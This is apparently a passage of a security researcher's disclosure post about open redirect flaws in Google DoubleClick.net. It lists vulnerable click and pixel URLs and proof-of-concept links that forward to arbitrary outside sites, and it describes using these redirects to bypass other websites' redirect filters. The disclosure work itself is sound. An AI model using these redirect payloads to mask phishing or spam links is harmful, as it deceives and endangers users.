<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 2:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;275260754;102106837;b?http://zerodistance.cio.com" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>275260754;102106837;b?http://<wbr></wbr>zerodistance.cio.com</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;276304929;103445101;w?http://tracker.marinsm.com/rd" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>276304929;103445101;w?http://<wbr></wbr>tracker.marinsm.com/rd</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>275260754;102106837;b?http://<wbr></wbr>www.inzeed.com/kaleidoscope/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>276304929;103445101;w?http://<wbr></wbr>www.tetraph.com/security</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 3:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1OTI4NzkxMzM3&<wbr></wbr>forward=http%3A%2F%2Fib.adnxs.<wbr></wbr>com</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http%3A%2F%2Fwww.reuters.com%" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1ODY0NDM1NzM2&<wbr></wbr>forward=http%3A%2F%2Fwww.<wbr></wbr>reuters.com%</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1OTI4NzkxMzM3&<wbr></wbr>forward=http://www.inzeed.com/<wbr></wbr>kaleidoscope/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1ODY0NDM1NzM2&<wbr></wbr>forward=http://www.tetraph.<wbr></wbr>com/security</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">...</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">We can see that Google DoubleClick.net has Open Redirect vulnerabilities and could be misused by spammers.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.3)</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC Video:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=lfKHVGHWvk8&feature=youtu.be" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=lfKHVGHWvk8&feature=youtu.be</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Several
other similar products 0-day vulnerabilities have been found by some
other bug hunter researchers before. Google has patched some of
them. BugTraq is a full disclosure moderated mailing list for the
*detailed* discussion and announcement of computer security
vulnerabilities: what they are, how to exploit them, and how to fix
them. The below things be posted to the Bugtraq list: (a) Information on
computer or network related security vulnerabilities (UNIX, Windows NT,
or any other). (b) Exploit programs, scripts or detailed processes
about the above. (c) Patches, workarounds, fixes. (d) Announcements,
advisories or warnings. (e) Ideas, future plans or current works dealing
with computer/network security. (f) Information material regarding
vendor contacts and procedures. (g) Individual experiences in dealing
with above vendors or security organizations. (h) Incident advisories or
informational reporting. (i) New or updated security tools. A large
number of the fllowing web securities have been published here, Buffer
overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL injection,
Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated
Redirects and Forwards, Information Leakage, Denial of Service, File
Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal,
HTML Injection, Spam. It also publishes suggestions, advisories,
solutions details related to Open Redirect vulnerabilities and cyber
intelligence recommendations.</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(3) Google DoubleClick.net Can Adversely Affect Other Websites.</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">At the same time, Google DoubleClick.net can be used to do "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" to other websites, such as Google, eBay, The New York Times, etc.(Bypass other websites' Open Redirect filters)</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.1) </b></span><b>Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Domain:</b></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">google.com</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"Google
is an American multinational technology company specializing in
Internet-related services and products. These include online advertising
technologies, search, cloud computing, and software. Most of its
profits are derived from AdWords, an online advertising service that
places advertising near the list of search results. Google was founded
by Larry Page and Sergey Brin while they were Ph.D. students at Stanford
University. Together they own about 14 percent of its shares but
control 56 percent of the stockholder voting power through supervoting
stock. They incorporated Google as a privately held company on September
4, 1998. An initial public offering followed on August 19, 2004. Its
mission statement from the outset was "to organize the world's
information and make it universally accessible and useful," and its
unofficial slogan was "Don't be evil". In 2004, Google moved to its new
headquarters in Mountain View, California, nicknamed the Googleplex. The
corporation has been estimated to run more than one million servers in
data centers around the world (as of 2007). It processes over one
billion search requests and about 24 petabytes of user-generated data
each day (as of 2009). In December 2013, Alexa listed google.com as the
most visited website in the world. Numerous Google sites in other
languages figure in the top one hundred, as do several other
Google-owned sites such as YouTube and Blogger. Its market dominance has
led to prominent media coverage, including criticism of the company
over issues such as search neutrality, copyright, censorship, and
privacy." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
